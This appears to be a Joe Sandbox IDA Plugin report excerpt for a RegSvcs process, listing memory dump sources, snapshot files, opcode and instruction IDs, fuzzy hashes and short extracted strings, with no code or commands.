                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Teeq$Teeq$p0@
                                                                                                                                                                                                  • API String ID: 0-3622955452
                                                                                                                                                                                                  • Opcode ID: ec6a9a72e0121cc0932369cadb79b88a8d355e26988d3a308952f5c4597b0ae8
                                                                                                                                                                                                  • Instruction ID: 08e9491aaa456e74cbecd4d3e357439c73ac2ddb221fb1b06fc413189a7c66f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec6a9a72e0121cc0932369cadb79b88a8d355e26988d3a308952f5c4597b0ae8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE412674B101048FCB44DFA9D998AAEBBF2FF89310F2144A9E406EB3A1DA719D01CF50
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Teeq$Teeq
                                                                                                                                                                                                  • API String ID: 0-1240912287
                                                                                                                                                                                                  • Opcode ID: 4ea20c80b221e739ce318ab2b3fa94def259579a6c77a2fcb02416dc389a2b00
                                                                                                                                                                                                  • Instruction ID: b1adfa103015262ab1286dbb1a746c5a5ca1c9479eb7b73169e2f4875e80dbf7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ea20c80b221e739ce318ab2b3fa94def259579a6c77a2fcb02416dc389a2b00
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21D370B042444FDF059B7E8855BAEBBE2AF89300F648169E501EB3E2CE748C05CB91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Teeq$Teeq
                                                                                                                                                                                                  • API String ID: 0-1240912287
                                                                                                                                                                                                  • Opcode ID: f9645988720a48d002528a2aa6c1a5a16ecb5b703b5ef1b64f027a6a94d40341
                                                                                                                                                                                                  • Instruction ID: 3ce11c4fa5c2e4bf0c3b91e82fe252ef77d6d2007c2f197fb8b60ac78b74ddf2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9645988720a48d002528a2aa6c1a5a16ecb5b703b5ef1b64f027a6a94d40341
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01114570B002044FDB04DF7AC4957BEB6E6AF88700F609469E506AB391CE745C05CB54
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (iq
                                                                                                                                                                                                  • API String ID: 0-3943945277
                                                                                                                                                                                                  • Opcode ID: b4fb81f3c45b507660e70edee6a9b389403b86e41c451aa82163e78d2e7ca86d
                                                                                                                                                                                                  • Instruction ID: 33a2ee4326b0518dce4f6534088cc1e2473f74d2012b3a0b5e69a9f5a73f86d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4fb81f3c45b507660e70edee6a9b389403b86e41c451aa82163e78d2e7ca86d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11917E74B10118DFCB49EFA8D554AAE7BF2FF88304B108569D406AB7A4DB31AD42CF94
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Ep
                                                                                                                                                                                                  • API String ID: 0-2664974837
                                                                                                                                                                                                  • Opcode ID: 2ffc5133666779d5bbbdece8929ec2723d923a81e4d14974268a4931fd356304
                                                                                                                                                                                                  • Instruction ID: 16c2e2aeae360b8759681a6bbfd8056458ac7b81b31efe032464b14e6ffb717c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ffc5133666779d5bbbdece8929ec2723d923a81e4d14974268a4931fd356304
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9513C74F001198FC745EB68D5A8A6E7BF2FB88314F2046A9E4099B399DB349D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Ep
                                                                                                                                                                                                  • API String ID: 0-2664974837
                                                                                                                                                                                                  • Opcode ID: 04610beeebe8f6078fbca5a2d60ae2a111a27235cfdba889ac57a14e75b3efe8
                                                                                                                                                                                                  • Instruction ID: 7ccb53d30fa641482e18b006a34b9d8bdea39485e39c47009b4489f98ae6d0b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04610beeebe8f6078fbca5a2d60ae2a111a27235cfdba889ac57a14e75b3efe8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE511C74F001198FC745EB68D5A8A6E7BF2FB88314F2046A9E4099B799DB349D42CF80
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: aeq
                                                                                                                                                                                                  • API String ID: 0-4159377277
                                                                                                                                                                                                  • Opcode ID: 1db7bf09e9f3da89f618cb3e5fbda06b447f6e0f83f8facd7cd02c4e9ba7c948
                                                                                                                                                                                                  • Instruction ID: 071a708aae1e0b4676aedfd5726eb8226565afee6c778b19b19872e2e3726880
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1db7bf09e9f3da89f618cb3e5fbda06b447f6e0f83f8facd7cd02c4e9ba7c948
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE210575A017149FC385EB388816AAE3FB2EF81310B84456AE005AB782DF346D06CBD1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Teeq
                                                                                                                                                                                                  • API String ID: 0-348098666
                                                                                                                                                                                                  • Opcode ID: 6119798113a2c12ca25af7c0b1849e1ddc0676fb579bcac59a9afd057af7f173
                                                                                                                                                                                                  • Instruction ID: c1ea3e68f69fd691dd756d3ada23e0f2654f5f675ad9705813ae5bffbaa44a2c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6119798113a2c12ca25af7c0b1849e1ddc0676fb579bcac59a9afd057af7f173
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E213574B052548FDB4AA764C9697FF3BB29F89310F11415AD401AB386CE381D07CBE1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: aeq
                                                                                                                                                                                                  • API String ID: 0-4159377277
                                                                                                                                                                                                  • Opcode ID: 83148e5df9b63ee2c9329ea75427f34a69dc07d2591f01548f98a4d93b4568bf
                                                                                                                                                                                                  • Instruction ID: 97e3c4251dcf044f9a057a298ae704f93e330c65b0248b8355aea18002b4b751
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83148e5df9b63ee2c9329ea75427f34a69dc07d2591f01548f98a4d93b4568bf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9211E271F006288FC784EB29D416A6E7FB2EBC4720F508629E406AB784DF305D02CBC1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Teeq
                                                                                                                                                                                                  • API String ID: 0-348098666
                                                                                                                                                                                                  • Opcode ID: c51f4f759d67a4da6d674700a58f306ad81c1e815c3cf6c7f906006b63e9bd34
                                                                                                                                                                                                  • Instruction ID: 19fd57e0beda4e7c680619f9354110a1421f53e657f25c8c4b13ff57891604cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c51f4f759d67a4da6d674700a58f306ad81c1e815c3cf6c7f906006b63e9bd34
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC018030B502289BDB59EB68C569BBF7BB2ABC8710F204529D401AB784CF746D42CBD5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: aeq
                                                                                                                                                                                                  • API String ID: 0-4159377277
                                                                                                                                                                                                  • Opcode ID: 0edea81344143d45e0606c82302da02faddfb95c1d97026d11d6701d7a04aa01
                                                                                                                                                                                                  • Instruction ID: e8c72111847fda14e26142b6c92b8297f95b5d065e9a5c3246201aa4e844a152
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0edea81344143d45e0606c82302da02faddfb95c1d97026d11d6701d7a04aa01
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43F0C274B006249BC795AB39D852A6E3BA2EBC0721F804A1DE5066F7C5DF706E46C7C1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LO
                                                                                                                                                                                                  • API String ID: 0-3966099685
                                                                                                                                                                                                  • Opcode ID: 98eb42670ed8aa71328491bfe8873afe3d74f9c055e447d56f365220f2667d65
                                                                                                                                                                                                  • Instruction ID: 03a5508a83d084694c39183d8bae1fa819b5ab1644343b3d946c8a16e43f7aed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98eb42670ed8aa71328491bfe8873afe3d74f9c055e447d56f365220f2667d65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D012B0B0010CEFCB00DFF5E94155DB7B9DB45200B1055A9D408E7241EB315F089B40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e9de0aa0c063f3113393970e7f753f8f932af4fbe7f148769e718020ef94d291
                                                                                                                                                                                                  • Instruction ID: 9921a87f7f94cbfd1938e781c29c41b39680c95cb098f49ce8d31e46699ac800
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9de0aa0c063f3113393970e7f753f8f932af4fbe7f148769e718020ef94d291
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9291EA38A00105DFCB95CFA9C594A6EBBB2BF89314F24856ED406AB361DB31ED42CF50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12b8ac74e7dc82ad607cf93f871d5428dcf29938c23fb15f6f0b657fc6a17c6b
                                                                                                                                                                                                  • Instruction ID: 6772a35251b76395486217ebe1586fd0816aeb058ddf0ec6fdcbbdd091a85faf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12b8ac74e7dc82ad607cf93f871d5428dcf29938c23fb15f6f0b657fc6a17c6b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D841CD70B002089FCB45EF68D4949AEBBF6FF85314B208569E4099B396DB31AD06CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f2dd1606cc34ae658ee538008f241a454aac96e17dd7f7ed291cca92d9df2fc1
                                                                                                                                                                                                  • Instruction ID: f260ce91f2fad83a3df2606fa037905c600c8dfe05ee0bc0faad23be5848d171
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2dd1606cc34ae658ee538008f241a454aac96e17dd7f7ed291cca92d9df2fc1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D413F34A04208CFDB96DFA9C584B5DBBB2BF44314F24856ED405AB356DB35AD42CF50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 276e1e2e07f60fc5cfaaa8d4817fd291398526698637a43f36c4a02fb3ab5989
                                                                                                                                                                                                  • Instruction ID: e9a3ae41a042553f9448f0a6f246c7a1656eca0b7d0748038b0775a1fc8f8b3d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 276e1e2e07f60fc5cfaaa8d4817fd291398526698637a43f36c4a02fb3ab5989
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F72103759053809FC796CF64D8809ABBFB0EF42314F09859FE494DB392D234AA06CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4e16cbe72499f0ef1a19a5741ab16d27f0e91e704147b843fd3441b5cb1a7ea9
                                                                                                                                                                                                  • Instruction ID: b096a68f7b18a9f64df95390b4703b2f428092868b933b19c3b6c76f7fa3d5da
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e16cbe72499f0ef1a19a5741ab16d27f0e91e704147b843fd3441b5cb1a7ea9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6711C2357002104FDB14EB7AE894A6E7BD6FFC4B64B448469E509DB3A5EE70DC018B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 66b98a0160fd576b41827a4bf352764c4efc6445a4f98c39084ee37c24543e62
                                                                                                                                                                                                  • Instruction ID: 1a067a580628b5c37bf0a196073e902a09cecad13c4a9d1a734c12c7f6a5e21d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66b98a0160fd576b41827a4bf352764c4efc6445a4f98c39084ee37c24543e62
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E210434600A008FC765DF19D584E52FBE5EF88324F45CA6EE45A8BBA2C770EC85CB80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e2387907f1db89319af54fd8ba604dbf6456bab155f35fc5e483a871c1771b39
                                                                                                                                                                                                  • Instruction ID: ff9b279cbfce643f56f2393829cc71461dd05d981bb26a13a5d4d1312ba65842
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2387907f1db89319af54fd8ba604dbf6456bab155f35fc5e483a871c1771b39
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B71154753042409FD7A6DF29D848A53BBF5EB89324B1489AEE449C7352D731E846C750
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d54f1dad4002025bd62e960c372fd33994c8b7f99a4476e1b504fe969e2623d0
                                                                                                                                                                                                  • Instruction ID: ef5c4fd995890c7993116cfb47708c77fdad67efbc89d6a8ceb601c9054e616b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d54f1dad4002025bd62e960c372fd33994c8b7f99a4476e1b504fe969e2623d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF11A1357042018FC710CB29D89497AFBE6EF8A220B18459EF589DB352D671EC05CB50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 19ae96a1fa6808697353475786ccdeca4bf863a6e6a9a730ad7a00c5a435d2b2
                                                                                                                                                                                                  • Instruction ID: ba52624195d062d6c3d8147cbe0f81efd7b1e082b8e08df06965f2c18ff3d4cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19ae96a1fa6808697353475786ccdeca4bf863a6e6a9a730ad7a00c5a435d2b2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD014F797002058FD750CB69D88892BBBE6EFCD265B14446AF549DB351DA71EC018B50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3292161627.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e3d000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 268825fb880e06314bcd13da9a32e8d55b68a11053481e674416b66d5150c65d
                                                                                                                                                                                                  • Instruction ID: 011b67af03eae868b89cda39dd3eab5f216db0f743fe97915d5d8aaa5ef86756
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 268825fb880e06314bcd13da9a32e8d55b68a11053481e674416b66d5150c65d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5012B7100D3009AE7159A1AECC8766BFA8DF41374F18C41AED086B186C335B840C6B1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 78cba87f2987860b7aebcca6911a4005e1e34d4969a0a023c74b54f18999e029
                                                                                                                                                                                                  • Instruction ID: d11dd4db5248c27b42f39ccf9d9e3f877a65c506ea1f6091c7e0261c23aa2353
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78cba87f2987860b7aebcca6911a4005e1e34d4969a0a023c74b54f18999e029
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA1103B58003498FCB60DFAAC884BDEBBF4EB48324F20841AD519A7350C775A944CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 81657c3747c7e45f85b9bfd7dacba45943fda2d0f4c902b8d0fa2de547ca1aa9
                                                                                                                                                                                                  • Instruction ID: 638606b04539d8bf20e8539d8e297ff465f9686d4d578a3444cccf9c365a11e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81657c3747c7e45f85b9bfd7dacba45943fda2d0f4c902b8d0fa2de547ca1aa9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E1115B58002498FCB60CFA9D884BDEBBF4EF48324F20841AD419A7350C735A944CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3292161627.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_e3d000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 764e8bd628e85624bee169b8a723292f52aba2bd70506788d2c2dda337d927a9
                                                                                                                                                                                                  • Instruction ID: c3b13b67657b3635d2b232fa9320c36aec282283237f30a2f853bf656ad3701a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 764e8bd628e85624bee169b8a723292f52aba2bd70506788d2c2dda337d927a9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0C8714043409EE7148A16DDC8762FF98EF51774F14C05AED085B286C375A840CA71
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0b0a17490c3f3671429bc4ea5822472a0d61d42cf4e6a67fb9ab136c3a43786b
                                                                                                                                                                                                  • Instruction ID: 7462c3f45e1cf1c9c1fd64f808d44bcf16a0f800c7195b239d8b10812216ab14
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b0a17490c3f3671429bc4ea5822472a0d61d42cf4e6a67fb9ab136c3a43786b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BF0E2639192848FCB439BB4CA1039E7F629F46614F1905EBC449CF363D9254A52C792
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d4bcadf187107c3615c447b9e88a50db450581987782d9757835f42c2185476a
                                                                                                                                                                                                  • Instruction ID: 966463f2ea0e655db158ba8f9556cf5529813fd32aa4988168ec95ba527851d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4bcadf187107c3615c447b9e88a50db450581987782d9757835f42c2185476a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E0C23110A3A02F9709DA14CC058B27B69EBC6510316888FF880872829A62AC0B83B1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3dfd2cf4ba3cbca01f46acb7cfd42a0d81c76d29f605f508a8540229fab641c3
                                                                                                                                                                                                  • Instruction ID: 8f8598a5bcec574107b410a5b80a926e77b7e6928f591d9dddc16b7c3449d208
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dfd2cf4ba3cbca01f46acb7cfd42a0d81c76d29f605f508a8540229fab641c3
